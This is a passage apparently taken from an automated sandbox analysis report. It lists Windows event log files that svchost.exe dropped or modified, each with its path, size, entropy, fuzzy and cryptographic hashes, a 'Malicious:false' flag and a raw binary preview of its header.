                                                                                                    Preview:ElfFile.....................................................................................................................Au>'ElfChnk.T...............T...................H...h..............................................................................<................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................................................U ..............................................................%...].......&...........**......T.........m...........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.709459105953104
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:ED1RFxRaayVadMRFyfqd9xZRta7Ea+5BVZUeaBhN1dJhlBlBJ9ZFN9NxKafEa9Ff:PnVYIyyqED5BVZUeJ+EsiA881rXTBr
                                                                                                    MD5:C6B0C1A87A8E4EFE9E0EB65607DE8626
                                                                                                    SHA1:CD9AD7BCC7900B181F10DC0F882CD6F7A0925EDE
                                                                                                    SHA-256:76076A93B78C35830563B968788EDEFF8F07292BB19381FD90AFF74135B36C51
                                                                                                    SHA-512:4F4E9AEEC781659E6C388185483D503CDAC06A720B07546196CB3DA39A8B3BF5E1683AF37DF07F5EA0636AFA8BE99DAADAB6714230D425C9A76F21B9071FFE8B
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.............................................i......................................................................25.W................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**...............i.ac.........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:modified
                                                                                                    Size (bytes):92880
                                                                                                    Entropy (8bit):2.5819246932462736
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:/hdo69CcoTorNorWorbvorTorZorQorNor7orqorlGhorDorrTo9orForAorlor1:/DCpVRmi+2DCpVRmi+h
                                                                                                    MD5:4B35F2F1ED83ADB2A77AEA631E101891
                                                                                                    SHA1:A55C788A1E5A4D1E10308273119F91CC577EBC6D
                                                                                                    SHA-256:AE36B4E15C048CCE09886A43244193AC5EB5BD6F890A3EEBA890D334ACC825EE
                                                                                                    SHA-512:2448DBE2A8D56A6316244C5B93D6FF83CEB990F1C0DEF3ED7D248DCE54066C2579B4E2D014BF9B2EC009A46018E9EA2AD2CD89459848F03BFEF080576E2DD278
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.........#...............#...........`P...R..v?]........................................................................................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................9..................................=5..............U/..............................**...............k...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-BindFlt%4Operational.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):0.9396510419138993
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:lrhAiPA5PNPxPEPHPhPEPmPSPRP3PoP1P0mPQP1P9xPkP9PlP:lr2Nz
                                                                                                    MD5:B72758CCEE8512796B5C0B20E650238B
                                                                                                    SHA1:B06916A4448F31BFA8E873AACE5354558E63F84B
                                                                                                    SHA-256:4E39F3C5D4C7B4A31A4ED8A5EF3EB1D2A1E3534B30A190490634E7AE22A78185
                                                                                                    SHA-512:663DA2530558C0B3E0E24DFB361DA376C94661E26F2D062FA9F858F313010A62979B12E53725C13B09C7FE2167E65FBD93A249AEB80CD9ACDF2C801EBA88037D
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk......................................)..(+....a$........................................................................................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................................................................'.......................**..x.............|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-Wcifs%4Operational.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):0.9305587103691081
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:khZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+lr:kWXSYieD+tvgzmMvG5m2a0lFT
                                                                                                    MD5:CD17F01CA17AC4D3AD87F61331DD6C98
                                                                                                    SHA1:07FC334341A4F26B94425F42657314D6BDA5C8B4
                                                                                                    SHA-256:96D54D59389EA69726AA8664CDCE78EB648061A397DBCBFD3501F1F08B4E01C5
                                                                                                    SHA-512:716CB006CC286BC86B8171B3E6CB3BCF5A72335EF9C87DAD6C3963424E928C0A6033623CF6101AAB2F36EBD3CDCA91D91AE1FD272F417B9D0541A07163C10D83
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk......................................)...*..S90w....................................................................`#..................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...........................................................................................................&...........**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):3.4679941088326207
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:hhqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqh28c:hbCyhLfISidW/l
                                                                                                    MD5:F5554CB9BDD51A99B83E806331C85D81
                                                                                                    SHA1:36274EBB088762C7EBD6C9CA03079E654B2B21CC
                                                                                                    SHA-256:B49CD1A02F754F55284F3488990F327A8B95AD3E43A257C09DB4A42E8F21F590
                                                                                                    SHA-512:C55987D0372EDB7B81A50FC979BD2F23DC19063FF3054B49036F81C2D9EE8DFAA8B75E885CF48B31D2D90994D6E89895E5E6F0A37D40E84EDCD47616AF653092
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.........W...............W...........h...0....I2.....................................................................h.`h................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................n............................................................................v..........**..`............0H..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-NCrypt%4Operational.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 84, DIRTY
                                                                                                    Category:dropped
                                                                                                    Size (bytes):117248
                                                                                                    Entropy (8bit):3.9004488546825997
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:VcMhFBuyKskZljdoKXjtT/r18rQXn8iLqa37ueocMhFBuyKskZljdoKXjtT/r180:2MhFBuVvMhFBuV
                                                                                                    MD5:EE91DBEC5E83520307077734B075AC3A
                                                                                                    SHA1:4176D2334922FEDA0A60DDBC7528F6E406EE9F84
                                                                                                    SHA-256:695088D5B20E600C2F032A54B24D469C0141F5BF372D2B16BBDEE619E7A4D11B
                                                                                                    SHA-512:7CF151A51FFF28F07F8CC79C597CE17BEFCB752D6EAB4424828FC1754850FFBF875BD4DE57B1B6FAF0249F31D56AEAE9E1476BA7C8DD1EBAC2DA6F948899D089
                                                                                                    Malicious:false
                                                                                                    Preview:ElfFile.................T......................................................................................................ElfChnk.........T...............T...................$Q..........................................................................................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............m...........................5A..........................................**..x...........,.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.907683624643196
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:MreAs/1/sPFsqBCBao/F6Cf2SEqEhwaK41HZaWRSgELNnLi:QHf
                                                                                                    MD5:9096105EBBA2D15F1B9899F3CF01DFF2
                                                                                                    SHA1:D4869CC54A2461E84465AD04FE47C4CF16D7DBA5
                                                                                                    SHA-256:B0A19F472669166AEBA8589255637C2420C2659B14A75AF7F0DB09346EBC63C8
                                                                                                    SHA-512:4E5B2B5E63BB4D0FCE47DD181F91D4CE67E39873C4259ACC623429D7F40AEBEEC5215AC9951D60C06209603FDC87B314B8B8F0063685D9BBE0B95085B3A5CE38
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.v...............v................... 5..07...c"......................................................................v..........................................V...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**..@...v.......<..:..........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):2.1348078088545632
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:Eh1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzDY:EMAP1Qa5AgfQQne
                                                                                                    MD5:7A88448FB4BA38F64C1B093E3E75D8F6
                                                                                                    SHA1:DCB056F09076BA9B68F7E6DC3CA8CFE35B14B8DB
                                                                                                    SHA-256:FF6F79517DA66B7561BAD2EA233EDE6270B1D1AC9E73D6A7BFE884F072F5BA17
                                                                                                    SHA-512:3FA44EEB57CB1352EA4F6F621D496C7E5B8BAC2E6E020581A9D76EFE09DC68A97BDB96669E66DEA37449B6A1085302E0DF0E311E63CD15E0492B9B6AF653DB55
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk......................................l...o...%.......................................................................]E.................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........................................&..............;....................R..........**..x...........HD................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-GroupPolicy%4Operational.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.43902002933379
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:UBh2/Echh8E09ENiEGJvJLENoE8REXuEFfPEHJEGEHlEeE1EoEcEeE4FEXhEbEyR:uuO9C+GhVsXdyTKuA
                                                                                                    MD5:33C45A6D76DDB9C70BD5678C5AD572EE
                                                                                                    SHA1:594008960FD7577699237ADAC7283FD28E725363
                                                                                                    SHA-256:25A38A95FA81B277D5F9EB9F073C7FB3FACC93134B76A220A9AF8D5C02C9A433
                                                                                                    SHA-512:733C3198BA7F937DDE4430EE5EAFFE2EA046BB529B00F6C16471BB0924E1A80572689E4FFC0C1C9143EC39129333C2FD25E3C87CA87BE4D458FDFCBF55BBE579
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.........>...............>............q...s....c......................................................................f..................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F....................)...............'...B..=3..................-...........]....>......U!..............}5......./...........-..........%...e<......**................wpc.........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-HelloForBusiness%4Operational.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):3.82808258474476
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:ahYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3Kln:a1T4hy3V3
                                                                                                    MD5:B5FC8A6DCA2BA348AA93E13A74296430
                                                                                                    SHA1:E240F286D1D8819A24D604E3FC05DCD0912435AB
                                                                                                    SHA-256:C7ECA77BDD22B581A47984EFC6ED8F2F2C7150D05A9E9C058F9885258C9209FD
                                                                                                    SHA-512:ADAD36651D6C62B11234589D0286E9192150377FC1E4BE8206C9AF2A42811072314B430116C8D223623F99415FFF6355A8F6DF6DC46045592A7A40DA2AB988B2
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.........................................`.....\F....................................................................Z...................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.............................................................../...........n...........**............... .$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-Boot%4Operational.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):2.8263275752843215
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:NhFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjDf6:NzSKEqsMuy645tZtPNIW
                                                                                                    MD5:46903C3074471A90620BA44CF650BF7E
                                                                                                    SHA1:CE3CAD2CF05299A1F3408C880434809448C14052
                                                                                                    SHA-256:C6689BD19C1A2865C6BBD31ADBF2AAC454392D306A94A6AA1A6B36F7D9B84512
                                                                                                    SHA-512:BEC53E08B496EE257D5D3C3DA9153147FF43671232C4A6C1FDE65EDC3E95C54CB85447D90FE6A003B0E20C1EAE367135F8EF0F42B74622AAB8EA3E124CF2C809
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.........\...............\.............................................................................................wt................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................=....................................................................`..........**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):2.4180762032715353
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:thMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3zD:tmw9g3Lf
                                                                                                    MD5:AE1839474F96911E4EE3332A8425DA24
                                                                                                    SHA1:597ECD9B28AF1D1298ABAA79A551024FB17964A9
                                                                                                    SHA-256:8F1B75DD1B05AA9B5DC87BBD50C245DE46AB7CD03B6A209EEC5D80D9CABABE98
                                                                                                    SHA-512:C85C7900D5209CB93EF60FC7E192752C26AE5E651F2770C66F765C6FFDB90C8B339B6A4CA7E08404B3E9F1E9801A2A053A2C1F70E59CF1292A7D2725C2F45EC4
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.........?...............?...........................................................................................Hu..................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n.......#....................................................................X..........**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-WHEA%4Operational.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):1.874446760990172
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:LhNIII0IVI2IqIBI9IwI2IzuxILIHImIiIKIyIiI:LHu
                                                                                                    MD5:DE41AB84B1966634E7F284CBE03FBFB7
                                                                                                    SHA1:6DF9366EADE699092EAAC0D89ABF7C1A79ADB7EA
                                                                                                    SHA-256:26A935203EE735630DD2E6030D4FD237933EB2B1225D059AFCD9075BF67D52D2
                                                                                                    SHA-512:102F865755B94F01AEDA2BB3ACC25D9952C9C671734E9D309222820CD75DD37720A4CABB8F67DAB8240AB228DDAB1E21799F1860D3B9AE059794C266ED7AB3A9
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.\.......\.......\.......\....................bR.....................................................................<%..................&.......................N...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**......\.........}.c.........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-LiveId%4Operational.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:MS Windows Vista Event Log, 16 chunks (no. 15 in use), next record no. 466, DIRTY
                                                                                                    Category:dropped
                                                                                                    Size (bytes):105648
                                                                                                    Entropy (8bit):4.865089386568948
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:Zyh1a51zuzNz0zxzuewKWMKhsa53FVJZa5qfua5n9R9o2KGzyzIz1a5ksR9o2KGU:YpxV9yVhN7pxV9yVhN
                                                                                                    MD5:EEC1A5C6358577C11ABAD96FDB025E45
                                                                                                    SHA1:9A6D61D7A1B9C3352E67F72AF87D1BC729B692C2
                                                                                                    SHA-256:7A494B1ACD10CF1D90B44522C05204B4914FB9E419EB136A31550CE9D6CD8FA4
                                                                                                    SHA-512:611BE82BB10A8C3DBD07824F2EB83A54EC3006627F6B72B39BD75B0326F9E495AB0DCD4F5B8FF8AE7F6A9C95AFDA835C768258DFA2D31CD93E13ED07933D69C5
                                                                                                    Malicious:false
                                                                                                    Preview:ElfFile.....................................................................................................................-...ElfChnk.....................................H...0.....u.......................................................................9.................".......................J...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................)...........**................Zyc.........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-NCSI%4Operational.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):1.1165373073916258
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:th1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMGmMqb+MvhMIv:teJWU
                                                                                                    MD5:23C3984CFC80D5EB368265BC60320FBB
                                                                                                    SHA1:28D8A2708573E7F572958A50C305565F47D44597
                                                                                                    SHA-256:B0724E891E7D9D36FB89BA438B5A38BAB643F3F69E70A3CFBA3EED70F395F7E6
                                                                                                    SHA-512:B20C58FAE6F74D130174BC3727627D7F8C76AF784B9670115788D17D1A4DC9C4FA5EAFA27DC4A1F822DE840A1A19BDB2261822D0DC26FCF1B0D26077F3EC6355
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk......................................1..p3..........................................................................V..........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&............................................................................................................%..........**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-NetworkProfile%4Operational.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):0.9578182571950208
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:Vhb1m1z1c1j1Y1z11L1b1X1j1Hs1z1j1m1E1b1:V8
                                                                                                    MD5:43DC6997B50EF80E595FA910F7F55726
                                                                                                    SHA1:7E630EB4F2554D625B807271F6DA8605AB75CC03
                                                                                                    SHA-256:53B3DA45A1EA1425070F1086CC5DF7E7AE20042408945B6AC47F17A065AE2AAD
                                                                                                    SHA-512:D9904C2282D5C9FCABD158407A137AB84FC5C6AACE3817F5208E9E3D158FFE98247C2AC184CA6D69FAF423937FE2B77295FA2BCA284EEE5093C805C674831AD6
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.....................................@(...)....6.........................................................................................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**..H...........o...b.........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4Operational.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):3.673905884872378
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:y/hDIEQAGxIHIFIWHIft6IT/nIGIEI8pIftaIT/JIdIWIyIILIQIhI0vcI7Iftq4:y/ZxGuTcri
                                                                                                    MD5:6D7EB70B742BCD0F68E8AE544D5FCDA0
                                                                                                    SHA1:BC17072C6DADDEF75C444A867F41536E94059CF4
                                                                                                    SHA-256:E9778FB60EF1EEB0206583DEDC42109930AD5FF8F7D06340BAE138945B4E066B
                                                                                                    SHA-512:680250D6A41016FADBF39445FBD295E679E5960565DF10D65A25DEDE1F0769B64666DAD80D6A3984D56DA1E7B5479990FC22502118FE5A631904C532235EC12E
                                                                                                    Malicious:false
